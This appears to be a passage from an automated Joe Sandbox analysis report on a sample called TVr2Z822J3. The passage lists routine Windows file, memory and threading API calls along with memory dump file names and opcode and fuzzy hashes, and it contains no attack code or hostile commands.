                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3828600508-0
                                                                                                                  • Opcode ID: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                                                                                                                  • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                                                                  • Opcode Fuzzy Hash: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                                                                                                                  • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                                                                  APIs
                                                                                                                  • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 1890195054-2766056989
                                                                                                                  • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                                                  • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                                                                  • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                                                  • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                                                                    • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                                    • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                                    • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4269121280-0
                                                                                                                  • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                                                  • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                                                                  • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                                                  • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@H_prolog
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1329742358-0
                                                                                                                  • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                                                  • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                                                                  • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                                                  • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1936579350-0
                                                                                                                  • Opcode ID: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                                                                                                                  • Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
                                                                                                                  • Opcode Fuzzy Hash: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                                                                                                                  • Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2976181284-0
                                                                                                                  • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                                                  • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                                                                                  • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                                                  • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                                                                                  APIs
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                                                                  • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocExceptionStringThrow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3773818493-0
                                                                                                                  • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                                                  • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                                                                                  • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                                                  • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3168844106-0
                                                                                                                  • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                                                  • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                                                                                  • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                                                  • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: H_prolog
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3519838083-0
                                                                                                                  • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                                  • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                                                                  • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                                  • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                                                                  APIs
                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                                  • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                                                                  • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                                  • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3498533004-0
                                                                                                                  • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                                  • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                                                                                  • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                                  • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                                  • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                                                                                  • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                                  • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                                                                                  APIs
                                                                                                                  • _beginthreadex.MSVCRT ref: 00406552
                                                                                                                    • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_beginthreadex
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4034172046-0
                                                                                                                  • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                                                  • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                                                                                                  • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                                                  • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: H_prolog
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3519838083-0
                                                                                                                  • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                                                  • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                                                                                  • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                                                  • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                                                  • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                                                                  • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                                                  • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                                                                  APIs
                                                                                                                  • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1425588814-0
                                                                                                                  • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                                                  • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                                                                  • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                                                  • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1033339047-0
                                                                                                                  • Opcode ID: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                                                                                                                  • Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
                                                                                                                  • Opcode Fuzzy Hash: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                                                                                                                  • Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                                                  • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                                                                  • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                                                  • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
